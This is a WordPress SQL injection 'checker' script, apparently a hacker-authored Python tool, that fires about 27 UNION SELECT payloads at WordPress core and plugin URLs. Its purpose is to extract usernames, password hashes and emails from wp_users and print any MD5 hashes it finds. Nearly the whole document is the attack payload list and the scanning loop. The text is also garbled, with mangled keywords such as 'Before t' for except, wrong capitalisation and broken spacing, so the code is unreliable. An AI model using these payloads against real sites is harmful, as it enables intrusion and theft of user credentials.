WordPress injection check script

 

#! /Usr/bin/python

# WordPress SQL Injection Checker v1

# For md5's in the source will use

# Http responses.

#__________

#_____\//________\_____/

#__ | //_/____////__/

#__ | //_///__//_////_//

#_____//_/\___/\____/\__,_/

# Http://www.vyc0d.uni.cc

# Vyc0d [at] hackermail [dot] com

 

Import sys, urllib2, re, time, httplib

 

# Bad HTTP Responses

BAD_RESP = [400,401,404]

 

Def main (path ):

Try:

H = httplib. HTTP (host. split ("/", 1) [0])

H. putrequest ("HEAD", "/" + host. split ("/", 1) [1] + path)

H. putheader ("Host", host. split ("/", 1) [0])

H. endheaders ()

Resp, reason, headers = h. getreply ()

Return resp, reason, headers. get ("Server ")

Before t (), msg:

Print "Error Occurred:", msg

Pass

 

Def timer ():

Now = time. localtime (time. time ())

Return time. asctime (now)

 

Print "\ n \ t wp SQL Injection Checker v1"

Print "\ t -----------------------------"

Print "\ t vYc0d-M0slem Hax0r"

 

Sqls = ["index. php? Cat = 999% 20 UNION % 20 SELECT % 20 null, CONCAT (CHAR (58), user_pass, CHAR (58), user_login, CHAR (58), null, null, null % 20 FROM % 20wp_users /*",

"Index. php? Cat = % 2527% 20 UNION % 20 SELECT % 20 CONCAT (CHAR (58), user_pass, CHAR (58), user_login, CHAR (58 )) % 20 FROM % 20wp_users /*",

"Index. php? Exact = 1 & sentence = 1 & s = % b3 % 27 ))) /**/AND/**/ID =-1/**/UNION/** SELECT **/, 5, user_pass, 9, 10, 13,14, 15,16, 17,18, 19,20, 22,/**/FROM/**/wp_users % 23 ",

"Index? Page_id = 115 & forumaction = showprofile & user = 1 + union + select + null, concat (user_login, 0x2f, user_pass, 0x2f, user_email), null, null + from + wp_tbv_users /*",

"Wp-content/plugins/wp-cal/functions/editevent. php? Id =-1% 20 union % 20 select % 201, concat (user_login, 0x3a, user_pass, 0x3a, user_email), from % 20wp_users --",

"Wp-content/plugins/fgallery/fim_rss.php? Album =-1% 20 union % 20 select % 201, concat (user_login, 0x3a, user_pass, 0x3a, user_email), 7%, 20 from % 20wp_users --",

"Wp-content/plugins/wassup/spy. php? To_date =-1% 20 group % 20by % 20id % 20 union % 20 select % 20 null, conca (0x7c, user_login, 0x7c, user_pass, 0x7c), null, null, null % 20% 20 from % 20wp_users ",

"Wordspew-rss.php? Id =-998877/**/UNION/**/SELECT/**/, concat (0x7c, user_login, 0x7c, user_pass, 0x7c), concat (0x7c, user_login, 0x7c, user_pass, 0x7c), 4,5/**/FROM/**/wp_users ",

"Wp-content/plugins/st_newsletter/shiftthis-preview.php? Newsletter =-1/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users ",

"Sf-forum? Forum =-99999/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users /*",

"Sf-forum? Forum =-99999/**/UNION/**/SELECT/**/0, concat (0x7c, user_login, 0x7c, user_pass, 0x7c, 0/**/FROM/**/wp_users /*",

"Forums? Forum = 1 & topic =-99999/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users /*",

"Index? Page_id = 2 & album = S @ BUN & photo =-333333% 2F % 2A % 2A % 2 Funion % 2F % 2A % 2A % 2 Fselect/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c)/**/from % 2F % 2A % 2A % 2Fwp_users/** WHERE % 20 admin % 201 = % 201 ",

"Wp-download.php? Dl_id = null/**/union/**/all/**/select/**/concat (user_login, 0x3a, user_pass) /**/from/**/wp_users /*",

"WpSS/ss_load.php? Ss_id = 1 + and + (1 = 0) + union + select + 1, concat (user_login, 0x3a, user_pass, 0x3a, user_email ), 3, 4 + from + wp_users -- & display = plain ",

"Wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame. php? GalleryID =-99999/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users /*",

"MyLDlinker. php? Url =-2/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users /*",

"? Page_id = 2/& forum = all & value = 9999 + union + select + (select + concat_ws (0x3a, user_login, user_pass) + from + wp_users + LIMIT +) -- + & type = 9 & search = 1 & searchpage = 2 ",

"Wp-content/themes/limon/cplphoto. php? Postid =-2 + and + 1 = 1 + union + all + select +, concat (user_login, 0x3a, user_pass, 12 + from + wp_users -- & id = 2 ",

"? Event_id =-99999/**/UNION/**/SELECT/**/concat (0x7c, user_login, 0x7c, user_pass, 0x7c) /**/FROM/**/wp_users /*",

"Wp-content/plugins/photoracer/viewimg. php? Id =-99999 + union + select +, 4, user (), 8 /*",

"? Page_id = 2 & id =-999 + union + all + select + 1, 2, 3, 4, group_concat (user_login, 0x3a, user_pass, 0x3a, user_email ), 6 + from + wp_users /*",

"Wp-content/plugins/wp-forum/forum_feed.php? Thread =-99999 + union + select +, 3, concat (user_login, 0x2f, user_pass, 0x2f, user_email), 7 + from + wp_users /*",

"MediaHolder. php? Id =-9999/**/UNION/**/SELECT/**/concat (User (), char (58), Version (), 6, database ()--",

"Wp-content/plugins/st_newsletter/stnl_iframe.php? Newsletter =-9999 + UNION + SELECT + concat (user_login, 0x3a, user_pass, 0x3a, user_email) + FROM + wp_users --",

"Wp-content/plugins/wpSS/ss_load.php? Ss_id = 1 + and + (1 = 0) + union + select + 1, concat (user_login, 0x3a, user_pass, 0x3a, user_email ), 3, 4 + from + wp_users -- & display = plain ",

"Wp-download.php? Dl_id = null/**/union/**/all/**/select/**/concat (user_login, 0x3a, user_pass) /**/from/**/wp_users/* "]

 

If len (sys. argv )! = 2:

Print "\ nUsage:./wpsqli. py <site>"

Print "Example:./wpsqli. py www.site.com/w.n"

Sys. exit (1)

 

Host = sys. argv [1]. replace ("http: //", ""). rsplit ("/", 1) [0]

If host [-1]! = "/":

Host = host + "/"

 

Print "\ n [!] Site: ", host

Print "[!] SQL Loaded: ", len (sqls)

 

Server = main ("/") [2]

Print "[!] Server: ", server

 

Print "\ n [!] Started: ", timer ()

 

Print "\ n [!] Scanning: SQL \ n"

For SQL in sqls:

Time. sleep (2)

Print "[+] Trying:", SQL. replace ("\ n ","")

Try:

Source = urllib2.urlopen ("http: //" + host + SQL. replace ("\ n", ""). read ()

Md5s = re. findall ("[a-f0-9]" * 32, source)

If len (md5s)> = 1:

Print "[!] ", Host + SQL. replace (" \ n ","")

For md5 in md5s:

Print "\ n \ t [!] Hash to MD5: ", md5

Failed T (urllib2.HTTPError ):

Pass

Print "\ n [-] Done \ n"